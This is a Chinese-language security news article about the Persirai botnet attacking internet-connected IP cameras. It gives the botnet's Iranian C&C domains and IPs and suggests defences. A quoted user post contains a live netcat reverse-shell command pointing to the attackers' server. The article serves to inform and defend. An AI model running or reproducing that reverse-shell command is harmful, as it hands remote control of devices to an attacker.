- A+
趋势科技发现了一种针对基于互联网的IP摄像机和录像机的新攻击,该攻击由一种名为PERSIRAI的新物联网(IOT)机器人提供支持。
趋势科技发现了对基于互联网的IP摄像机和录像机的新攻击。 名为ELF_PERSIRAI的新的物联网(IOT)攻击也被追溯到一家伊朗研究机构,该机构仅限制其对伊朗人的使用,这表明德黑兰可能进行国家支持的网络罢工。
“我们发现的C&C(命令和控制)服务器被发现使用.IR国家代码。 该特定国家代码由伊朗研究机构管理,该机构仅限于伊朗人。 我们还发现了一些恶意软件作者使用的特殊波斯字符,“趋势科技在其发布的发布版本中表示。
IP Camera用户也遇到了恶意软件攻击,并指出其起源点似乎是伊朗。
“您好在我的2台 ip 摄像机( nc load.gtpnet.ir 1234 -e / bin / sh) 上找到了以下文字, 并想知道该域名属于谁? 我所知道的是,这是一个伊朗地址,无论 是谁 。 我很明显被黑了,其中一台摄像机就在儿童房里,“一位用户在Reddit黑客论坛上说道。
这次袭击是基于此前成功的Mirai IOT针对IP摄像机的攻击,该摄像机用于在2016年以巨大的拒绝服务(DOS)攻击来破坏互联网。然而,超过120,000个IP摄像机系统似乎被感染,超过30% Persirai目标在中国境内,只有一小部分位于中国境外; 在意大利(3%),英国(3%)和美国(8%)。
Persirai袭击在许多方面令人不安。 它基于开源Mirai攻击表明,免费提供的源代码将被攻击者修改为以不同形式再次攻击。 Persirai也非常隐秘,让大多数相机所有者都不知道他们的系统被感染了。
然而,最糟糕的特征是用于运行恶意僵尸网络的命令和控制计算机正在使用IR或伊朗的国家代码。 受感染的IP摄像机向命令服务器报告:
- load.gtpnet.ir
- ntp.gtpnet.ir
- 185.62.189.232
- 95.85.38.103
Persirai攻击会自行安装,然后删除安装文件以隐藏其在目标摄像头上的存在,仅在内存中运行。 然后继续下载并安装其他控制软件和阻止软件。 一旦与命令和控制网络服务器建立通信,则命令受感染的摄像机搜索其他摄像机并感染它们。
通过将ftpupdate.sh和ftpupload.sh指向/ dev / null,Persirai阻止其他零日攻击获得对目标IP摄像头的访问,从而防止其他攻击。 此功能可能是为了防止Persirai的重复攻击,以防止其他僵尸网络攻击者获得对现在捕获的IP摄像头的控制。 Persirai在内存中运行的事实确实意味着一旦IP Camera重新启动它也会被淘汰但是,除非用户采取反措施,否则目标系统仍然容易受到攻击。
虽然趋势科技建议IP Camera用户使用强密码,但Persirai攻击不依赖于密码攻击,也不会窃取密码。 更好的对策是禁用路由器上的通用即插即用(UPnP)功能。 通用即插即用(UPnP)是一种网络协议,允许IP摄像机等设备打开路由器上的端口,并像服务器一样运行。 此功能还使附加设备成为Persirai恶意软件攻击的高度可见目标。
用户还可以简单地从互联网访问中删除他们的IP摄像机系统,然后设置专用VPN服务,以允许他们通过远程登录摄像机。 还建议用户更新其IP摄像机上的固件,并仔细检查任何与Web地址相关的活动。
Persirai攻击是通过传统上不被视为计算机的设备在互联网上罢工的新趋势的一部分。 这些恶意软件攻击说明了供应商在很少或没有安全性的情况下销售硬件的问题。 IOT设备安全性目前没有法规或标准。 消费者实际上是独立的,经常选择没有安全功能的低成本系统,例如加密甚至制造商更新。
虽然许多物联网用户都知道用最新软件更新他们的计算机和手机并执行防病毒检查,但他们并不知道其他设备,如照相机,洗衣机,冰箱和DVR录像机也可能需要安全检查。 即使是主要制造商的DVD播放器和智能电视也很容易受到攻击,如中央情报局与英国GCHQ间谍机构合作攻击三星电视的维基解密发布的WEEPING ANGEL攻击所示。
出处:http://securityaffairs.co/wordpress/59024/malware/persirai-attack.html
